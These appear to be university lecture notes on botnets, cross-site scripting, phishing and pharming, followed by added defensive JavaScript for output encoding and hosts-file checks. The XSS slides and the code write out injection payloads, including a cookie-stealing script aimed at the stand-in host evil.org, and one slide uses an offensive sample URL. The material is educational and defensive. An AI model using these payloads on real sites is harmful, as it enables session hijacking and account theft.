XSS2008 - From Botnets to Cross Site Scripting Botnets...


From Botnets to Cross Site Scripting

Emergence of Bots (timeline, 1993 to present)
• 1993: EggDrop discovered, recognized as the first IRC bot
• 1999: W32/PrettyPark, the first worm to use IRC as C&C
• 2000: GT bots combined an mIRC client with hacking scripts and tools
• 2002: W32/Sdbot, the first family of bots developed as a single binary
• 2002: W32/Agobot bot family added modular design and significant functionality
• 2003: W32/Spybot family emerged
• 2005: W32/Mytob hybrid bot, major e-mail outbreak

SpyBot worm
• The Spybot worm is a large family of computer worms of varying characteristics.
• Although the actual number of versions is unknown, it is estimated to be well into the thousands.
• This briefly held the record for most variants, but has subsequently been surpassed by the Agobot family.
• Spybot variants generally have several things in common:
– The ability to spread via the popular P2P program KaZaA, often in addition to other such programs.
– The ability to spread via at least one vulnerability in the Microsoft Windows operating system. Earlier versions mostly used the RPC DCOM buffer overflow (MS03-026), although now some use the LSASS buffer overflow (MS04-011).
– The ability to spread via various common backdoor Trojan horses.
– The ability to spread to systems with weak administrative passwords.

Large choice
• For bot software, an attacker has numerous options, including Agobot, Phatbot, Forbot, XtremBot, SDBot, Rbot, URBot, UrXBot, and Perl-based bots.
• Whatever the choice, the software itself often leverages several different known vulnerabilities, infecting and spreading until it assembles a respectable bot force.
• Each host that the bot software compromises becomes a node in a vast sleeper cell of machines awaiting an "attack" command.
• Generally, the compromised machines' authorized users have no idea their computers are subject to a third party's control.
• This is because a good bot spreads widely, quietly, and unobtrusively.
Tracking botnets
• Nepenthes: collects samples of autonomous spreading malware ("war on errorism"), http://nepenthes.mwcollect.org/
• CWSandbox: automatically analyses a given sample (behavior-based malware analysis), http://www.cwsandbox.org/
• Botspy: observes a given botnet

Lifetime of botnets
• One botnet was active for more than 250 days
• Approx. 15-20 new botnets every day
• Approx. 130 botnets at the same time
• Only about 50% are active for more than two days
• Problem: some botnets run on public IRC servers

Can the Law make a difference?

The Botnet Economy
• Because botnets are associated with substantial illegal revenue, a thriving underground economy has sprung up around botnet activity.
• Rob Thomas of Team Cymru has written a comprehensive paper on this economy: "The Underground Economy - Priceless".
• http://www.usenix.org/publications/login/2006-12/openpdfs/cymru.pdf
• Peter Gutmann of the University of Auckland has written another comprehensive paper on this subject, "The Commercial Malware Industry", tracing the evolution of malware and botnets.
• http://www.cs.auckland.ac.nz/~pgut001/pubs/malware_biz.pdf

Botherders offer "service level agreements" to clients
• Guaranteed replacement of the botnet in case anti-virus researchers release a fix for the malware or the botnet is taken down
• Organized crime is involved in all stages of the ecosystem
• Employs virus writers to create malware
• Carries out spam campaigns, espionage, ID theft, cyber-attacks
• Launders money stolen from victims

The Botnet and the law
• News headline: "Botnet Herder Pleads Guilty to Massive PayPal Scam"
• Virus writers, botherders, clients:
– The virus writer writes malware and infects computers to create a botnet
– The botherder operates the botnet "command and control" (C&C)
– Clients hire botnets to distribute spam, launch Distributed Denial of Service (DDoS) attacks, or conduct identity theft
• Highly developed underground channels of communication
• "Secret" forums/chatrooms that shift location
• Access on a need-to-know basis; new entrants may need to be vouched for by an existing participant

Developing countries
• The botnet problem (like the spam problem) is the same problem worldwide, but it is particularly acute in emerging Internet economies, owing to resource scarcity and capacity issues.
• Government, industry, and civil society in emerging Internet economies are often ill equipped to deal with the catastrophic effects of botnets.

XSS
• The most popular (and most devastating) CSS/XSS attack is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process.
• The mechanism of the attack is not difficult and can be automated.
• Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code.
• Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.
Attacks: client-side scripting
• Client-side scripting generally refers to the class of computer programs on the web that are executed client-side, by the user's web browser, instead of server-side (on the web server).
• This type of computer programming is part of the Dynamic HTML (DHTML) concept, enabling web pages to have different and changing content depending on user input or other variables.
• Web authors write client-side scripts in languages such as JavaScript.
• Client-side scripts are often embedded within an HTML document.

JavaScript
• JavaScript was influenced by many languages and was designed to have a similar look to Java, but be easier for non-programmers to work with.
• The language is best known for its use in websites (as client-side JavaScript), but is also used to enable scripting access to objects embedded in other applications.
• Despite the name, JavaScript is essentially unrelated to the Java programming language, though both have a common debt to C syntax, and JavaScript copies many Java names and naming conventions.

XSS uses the vulnerability
• Injected client-side code (script or applet) gets no access beyond the browser's Document Object Model (DOM) and is restricted to what is commonly referred to as a sandbox. That is enough for the attacker: the injected code runs under the vulnerable site's origin, so the DOM it sees includes that site's cookies and page content.
• The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines.
– Additionally, a victim doesn't necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

Example:
• The vulnerable link looks like:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
• The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows (a browser percent-encodes the angle brackets on the wire; the server decodes them before welcome.cgi sees the value, so the raw form is shown here for readability):
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
...
And the vulnerable site's response would be:
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>

HyperText Markup Language (HTML)
• HTML is the predominant markup language for web pages.
• It provides a means to describe the structure of text-based information in a document, by denoting certain text as links, headings, paragraphs, lists, and so on, and to supplement that text with interactive forms, embedded images, and other objects.
• HTML is written in the form of tags, surrounded by angle brackets.
• HTML can include embedded scripting language code which can affect the behavior of web browsers and other HTML processors.

HTML Tag: <SCRIPT>
• Adds a script that is to be used in the document. Attributes:
– type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is the recommended replacement for the "language" attribute.
– language = Identifies the language of the script, such as JavaScript or VBScript.
– src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Older references list this as Netscape-only; every current browser supports it, which is what makes the remote-script injection vector below work.)
• Supported by: Netscape, IE 3+, HTML 4, Opera 3+
• Example: Hello World! <SCRIPT>malicious code</SCRIPT>

HTML Tag: <OBJECT>
• Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object. Attributes:
– classid = Identifies the class identifier of the object.
– codebase = Identifies the URL of the object's codebase.
– codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
– data = Specifies the URL of the data used for the object.
– name = Specifies the name of the object to be referenced by scripts on the page.
– standby = Specifies the message to display while the object loads.
– type = Specifies the media type for the data.
– usemap = Specifies the imagemap URL to use with the object.
• Supported by: Netscape, IE, HTML 4

HTML Tag: <EMBED>
• Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag. Attributes:
– hidden = Hides the media file or player from view when set to yes.
– name = Specifies the name for the embedded object for later reference within a script.
– pluginspage = Specifies the URL for information on installing the appropriate plug-in.
– src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only)
– code = Specifies the class name of the Java code to be executed. (IE only)
– codebase = Specifies the base URL for the application. (IE only)
– pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only)
– type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only)
• Supported by: Netscape, IE 3+, Opera 3+
• Example: Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">

Summary of the attack
• The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session IDs.
• The attacker finds a CSS-vulnerable page on the site, for instance http://trusted.org/account.asp.
• Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
• Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker.
For instance:
<img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
(Note that a browser decodes the response to an IMG fetch as an image, not as a document, so the reflected script does not execute from this tag as written; the same URL delivered as a link or in an IFRAME, as the earlier slide notes, does run it.)
• Unknown to the victim, the attacker has now received a copy of their cookie information.
• The attacker now visits the web site and, by substituting his cookie information with that of the victim, is perceived to be the victim by the server application.

Code Insertion
• Security professionals have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods:
• Inline scripting
– http://trusted.org/search.cgi?criteria=<script>code</script>
– http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>
– http://trusted.org/COM2.<IMG%20src="Javascript:alert(document.domain)">
• Forced error responses
– http://trusted.org/<script>code</script>
– This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.
• XSS is 95 percent avoidable with proper filtering techniques on any user-supplied data. While making sure that every element is filtered in large (and especially legacy) web applications can be a daunting task, properly implemented filters can prevent your site from falling victim to the above-mentioned attack scenarios. Filtering input is necessary but not sufficient; the reliable control is encoding output for the context (HTML body, attribute, URL or script) into which it is written, since a javascript: URL in an IMG src survives HTML encoding untouched.

You can't bank on security

Next big problems?
• New hacking technique exploits a common programming error. "This is a bit of a Pandora's box and once we open it, it will be just the tip of the iceberg."

Dangling pointers
• Jonathan Afek and Adi Sharabani of Watchfire stumbled upon the method for remotely exploiting dangling pointers by chance while they were running the company's AppScan software against a Web server.
– Dangling pointers are errors in software code that fail to refer to a valid object. Often the object that was referenced was deleted without changing the value of the pointer.
• Dangling pointers are quite common, but security experts and developers have said for years that there is no practical way to exploit them, so they've been considered quality-assurance problems and not security flaws.
• But now that has changed.

Similar to BO (buffer overflow)
• "The common thought was that this kind of problem isn't exploitable. But we looked at this and thought, wouldn't it be neat if we could implement our own code on this server?" said Danny Allan, research director at Watchfire, based in Waltham, Mass.
• "The problem before was, you had to override the exact location that the pointer was pointing to. It was considered impossible. But we discovered a way to do this with generic dangling pointers and run our own shell code."
• "The long and short of it is, if you can determine the value of the pointer, it's game over."
• "The outcome is much like a buffer overflow. It's very severe," Allan said.
• "This is a bit of a Pandora's box and once we open it, it will be just the tip of the iceberg."

Year of the Clever Rat
Crime gangs are perfecting ways to steal data and commit fraud:
1- One pioneering gang is taking over home network routers instead of PC hard drives, a sneakier way to hijack online accounts.
2- Another has perfected a way to use compromised PCs to repeatedly click on Internet ads to generate ad payments to the crooks.
3- Phishing specialists are putting finer touches on scams to trick people into divulging sensitive personal data on fake Web pages.
4- Meanwhile, top-level crime rings are getting stealthier and more efficient at herding millions of compromised PCs, referred to as bots, into networks that they deploy to steal data, commit extortion and spread spam.
Routers
• One gang has begun sending out tainted email greeting cards that, when opened, give the intruders control of the recipient's router.
– Targeting a router model popular in Mexico, these crooks have defrauded patrons of a large Mexican bank (Symantec, SYMC).
• Copycats are now the concern: "This attack technique can be generalized quite easily to go after multiple router brands and multiple banks."

Click fraud
• This month, someone has tainted tens of thousands of mom-and-pop e-commerce sites, Landesman says.
• Clicking to one of these sites can trigger ads selling fake anti-spyware or turn the visitor's PC into a hub for clicking on Web ads, while routing the ad payment to the intruder.

Phishers
• Newly available at a French website: a turn-key phishing kit with everything needed to create bogus bank websites, including templates of official-looking bank letters requesting data.
• In another current scam, an e-mail targets high-net-worth individuals with ruses keying off the arrival of tax season.

Phishing
• The first recorded mention of the term "phishing" is on the alt.online-service.America-online Usenet newsgroup on January 2, 1996,[4] although the term may have appeared earlier in the print edition of the hacker magazine 2600.[5] A phishing technique was described in detail as early as 1987, in a paper and presentation delivered to the International HP Users Group, Interex.[6]
• The term phishing is a variant of fishing,[7] probably influenced by phreaking,[8][9] and alludes to the use of increasingly sophisticated baits used in the hope of a "catch" of financial information and passwords. The word may also be linked to leetspeak, in which ph is a common substitution for f.[10]

Photos to Fight Phishing?
• In a bid to stave off phishing attacks, Bank of America is offering a new service that allows online customers to verify that they are indeed at the bank's official site by displaying an image that the customer supplies in advance.
• The free service, called SiteKey and developed by Passmark Security of Redwood City, Calif., lets customers pick any image they have, then write a brief phrase and select three "challenge questions."
– When the customer next visits bankofamerica.com and enters a username, clicking on the SiteKey button displays their chosen image, embedded in the bank's site.
– Customers are prompted to answer one of the challenge questions if they want to access their account from a different computer.
– Caveat: the image only proves that whoever served the page could obtain it. A phishing site that proxies the victim's username to the real bank can fetch the image and display it, so the image by itself is not proof of the site's identity.

Pharming
• Pharming is a hacker's attack aiming to redirect a website's traffic to another, bogus website.
• Pharming can be conducted either by changing the hosts file on a victim's computer or by exploitation of a vulnerability in DNS server software.
• DNS servers are computers responsible for resolving Internet names into their real addresses; they are the "signposts" of the Internet. Compromised DNS servers are sometimes referred to as "poisoned".
• Pharming has become of major concern to businesses hosting e-commerce and online banking websites.
– Sophisticated measures known as anti-pharming are required to protect against this serious threat.
– Antivirus software and spyware removal software cannot protect against pharming done on the DNS side; a tampered hosts file on the victim's own machine is the one variant a host-based scanner can catch.
• In recent years both pharming and phishing have been used to steal identity information.

Zhelatin
• Use of botnets for cybercrime has increased and become more refined since 2002-3, when mass mailer worms such as Sobig and Sober were released.
• 2007-generation botnets such as Zhelatin (Storm Worm) are particularly aggressive, using advanced techniques such as fast-flux networks to make them harder to shut down and even striking back with denial of service (DDoS) attacks against security researchers or vendors trying to mitigate the botnet.

Gang (15M) Tactic

The Internet battlefield
• The end of 2006 was difficult for antivirus companies around the world.
– Virus researchers around the world were in a state of high alert, mobilizing all their resources throughout the final quarter of the year.
• This was caused by the unprecedentedly long and widespread attacks on the Internet caused by the unknown authors of the Warezov family of email worms.
– The first examples of this worm appeared on the Internet in October 2006, and were most active towards the end of the month, when up to 20 new variants appeared in the space of 24 hours.
– By the end of 2006 we had detected more than 400 variants of Warezov. In many ways, Warezov is extremely similar to the notorious Bagle.
• Bagle was the first to use this virus technology in order to provide fresh material for spammers' address databases; Warezov did exactly the same.
• Although Warezov is based on Mydoom.a source code, and Bagle was a completely original program created by an unknown group of virus writers, we are inclined to view these two worms as being related.
– Firstly, the way in which the epidemics were organized is extremely similar, with a large number of variants being mass mailed within a short period of time, which differ according to geographical region (e.g. the variants mailed in Russia differed from those mailed in Europe).
– Secondly, their functionality, installing other worm modules from Trojanized sites and collecting email addresses which are then sent to a remote malicious user, is identical.

Storm Worm = ...
• On 18th January 2007, hurricane Kyrill swept Europe.
– The storm took the lives of more than 30 people. Tens of thousands of Europeans were left without light, mobile connections or normal transport.
– The world's attention was focused on the events, which were covered by the mass media around the clock.
• On 20th January, another storm hit, but this time the victim was email. The gigantic mass mailing contained messages with subjects like:
– 230 dead as storm batters Europe.
– Russian missle shot down Chinese satellite
– Chinese missile shot down USA aircraft
– Sadam Hussein alive!
– Venezuelan leader: "Let's the War beginning".
– Fidel Castro dead.
– President of Russia Putin dead
– Third World War just have started!
• ... = Email-Worm.Win32.Zhelatin.a
• The attached files were actually a Trojan program, which got classified as Trojan-Downloader.Win32.Small.dam and Trojan-Downloader.Win32.Small.bet.
• This Trojan would download other components to the victim machine, the result being a new, extremely aggressive network worm which utilized rootkit technologies.
• Unofficially it was christened "the Storm worm".
• The official name given to it in our antivirus databases was Email-Worm.Win32.Zhelatin.a.

Cyberwar between gangs
• War had been declared in cyberspace between the groups producing Warezov and Zhelatin.
• Taking into account the size of the botnets used by both groups, and their clear aim to conduct a large number of attacks, the situation was clear: this was threatening to become one of the most serious problems on the Internet in recent years.

Warezov versus Zhelatin
• The authors of Warezov began responding to Zhelatin attacks in March, and Bagle started periodically putting its head above the ramparts several times a month from March onwards.
• At the end of last year, antivirus companies were only having to combat attacks from a single group, but now the complexity and volume of the task had increased threefold.
• And all of this was accompanied by an increase in spam and phishing.
– Almost 32% of all malicious code in mail traffic in March 2007 was made up of Trojan-Spy.HTML.Bankfraud.ra.
– This was clearly a result of the epidemics caused by Bagle, Zhelatin and Warezov.
– This malicious program is a typical phishing email, and millions of copies were sent around the world. We also detected repeat sendings of this Trojan, which was initially detected on 27th February 2007.
– The Trojan targets Branch Banking and Trust Company clients, luring them to fake sites which are registered by malicious users in Croatia and the Cocos (Keeling) Islands.

Sven Jaschan
• Until now, the best known cyber conflict was that between Mydoom, Bagle and NetSky, back in spring 2004.
• The Internet was flooded with dozens of variants of these worms:
– they scanned victim machines for their competitors and took their place, deleting the original worm.
• The war was brought to an end by the arrest of 18-year-old Sven Jaschan, the author of NetSky, in Germany.
• However, his creations remain among the most widespread worms in mail traffic.
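Returning to the reflected XSS example (welcome.cgi) and the "Code Insertion" vectors above: the following is an added example, not code from the lecture slides, showing in Node.js how the ?name= value reaches the response, the vulnerable rendering beside an output-encoded one, and why a URL-valued attribute (the IMG src="Javascript:..." vector) needs scheme validation rather than HTML encoding alone. The payload strings are constructed from the slide's examples; evil.org, badkama.js and the function names are illustrative.

```javascript
// Added example (not from the lecture slides): reflected XSS sink modelled on
// the welcome.cgi page, vulnerable and hardened forms. Node.js, no dependencies.

// Constructed payloads taken from the slide's injection vectors.
const PAYLOADS = {
  inlineScript: "<script>alert(document.cookie)</script>",
  remoteScript: "<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>",
  cookieTheft:
    "<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>",
  urlVector: "Javascript:alert(document.domain)",
};

// Extract the ?name= value from a raw HTTP request line. The browser sends
// the brackets percent-encoded; searchParams decodes them, which is the
// state welcome.cgi sees the value in.
function nameFromRequestLine(requestLine) {
  const path = requestLine.split(" ")[1];
  return new URL(path, "http://www.vulnerable.site").searchParams.get("name");
}

// Vulnerable: untrusted input concatenated straight into the HTML body,
// producing exactly the "Hi <script>..." response shown on the slide.
function renderWelcomeUnsafe(name) {
  return `<HTML>\n<Title>Welcome!</Title>\nHi ${name}\n<BR>\nWelcome to our system\n</HTML>`;
}

// Encode the characters that change meaning in HTML text and attribute
// contexts. '&' goes first so the entities emitted here are not re-encoded.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: same page, the name is encoded for the HTML body context.
function renderWelcomeSafe(name) {
  return `<HTML>\n<Title>Welcome!</Title>\nHi ${escapeHtml(name)}\n<BR>\nWelcome to our system\n</HTML>`;
}

// URL attribute context (IMG src, A href): encoding does not neutralise a
// javascript: URL because the browser navigates to the decoded value.
// Parse it and allow only http(s); return null for anything else.
function safeUrlAttribute(candidate) {
  let parsed;
  try {
    parsed = new URL(candidate);
  } catch (_) {
    return null;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return null;
  return escapeHtml(parsed.href);
}

// Crude signature filter of the kind the slide's "filtering" refers to. It
// catches the vectors above but is a detector only; encoding is the control.
function looksLikeScriptInjection(value) {
  return /<\s*script|javascript\s*:|<\s*(img|iframe|object|embed)\b/i.test(value);
}

// Stand-alone demonstration of the vulnerable and hardened responses.
const reflected = nameFromRequestLine(
  "GET /welcome.cgi?name=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0"
);
console.log(renderWelcomeUnsafe(reflected));
console.log(renderWelcomeSafe(reflected));
console.log("javascript: URL accepted:", safeUrlAttribute(PAYLOADS.urlVector) !== null);
```

Two points worth taking from running it: the encoded request line yields the identical script tag the slide shows once searchParams has decoded it, and the javascript: URL passes escapeHtml unchanged, which is why the URL context gets an allow-list on the scheme instead.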
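On the pharming slide above, the hosts-file variant is the one a host-based check can catch. The following is an added example, not code from the lecture, that parses a hosts file and flags entries overriding domains on a watch list, distinguishing a redirect to a routable address (pharming) from a loopback or 0.0.0.0 sink (a block). The hosts text, the bank.example and shop.example domains, and the function names are constructed for the example; the parser follows the real file format (one "IP host [alias ...]" per line, '#' starts a comment).

```javascript
// Added example (not from the lecture slides): hosts-file pharming check.
// Node.js, no dependencies.

// Constructed sample of a tampered hosts file (203.0.113.0/24 and
// 198.51.100.0/24 are documentation ranges standing in for attacker hosts).
const SAMPLE_HOSTS = `
# constructed sample of a tampered hosts file
127.0.0.1       localhost
::1             localhost ip6-localhost
127.0.0.1       metrics.example.org          # benign ad blocking
203.0.113.7     www.bank.example online.bank.example   # pharming entry
203.0.113.7     shop.example
198.51.100.22   WWW.BANK.EXAMPLE
`;

// Domains (and their subdomains) whose resolution must never be overridden
// locally: the bank and e-commerce sites the slide is concerned with.
const WATCH_LIST = ["bank.example", "shop.example"];

// Parse hosts-file text into {ip, host, line} records, one per hostname.
// Comments and blank lines are dropped; hostnames are lower-cased because
// DNS names are case-insensitive and attackers do vary the case.
function parseHosts(text) {
  const entries = [];
  text.split(/\r?\n/).forEach((rawLine, index) => {
    const line = rawLine.split("#")[0].trim();
    if (!line) return;
    const [ip, ...hosts] = line.split(/\s+/);
    for (const host of hosts) {
      entries.push({ ip, host: host.toLowerCase(), line: index + 1 });
    }
  });
  return entries;
}

// Exact match or subdomain of a watched domain ("www.bank.example" matches
// "bank.example"; "notbank.example" does not).
function isWatched(host, watchList) {
  return watchList.some((d) => host === d || host.endsWith("." + d));
}

// Loopback and the unspecified address only block the site; anything else
// sends the victim's traffic to a host the attacker controls.
function isLocalSink(ip) {
  return ip === "0.0.0.0" || ip === "::1" || ip.startsWith("127.");
}

// Return every watched-domain override, labelled by its effect.
function findPharmingEntries(text, watchList) {
  return parseHosts(text)
    .filter((e) => isWatched(e.host, watchList))
    .map((e) => ({ ...e, effect: isLocalSink(e.ip) ? "blocked" : "redirected" }));
}

// Stand-alone run: print one line per suspicious entry.
for (const hit of findPharmingEntries(SAMPLE_HOSTS, WATCH_LIST)) {
  console.log(`line ${hit.line}: ${hit.host} ${hit.effect} to ${hit.ip}`);
}
```

To check a live machine, read /etc/hosts (or %SystemRoot%\System32\drivers\etc\hosts on Windows) into the text argument and supply your own watch list; a DNS-side poisoning shows nothing here, which is the limit the slide describes.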
This note was uploaded on 05/12/2008 for the course EPP 19601 taught by Professor Morel during the Spring '08 term at Carnegie Mellon.
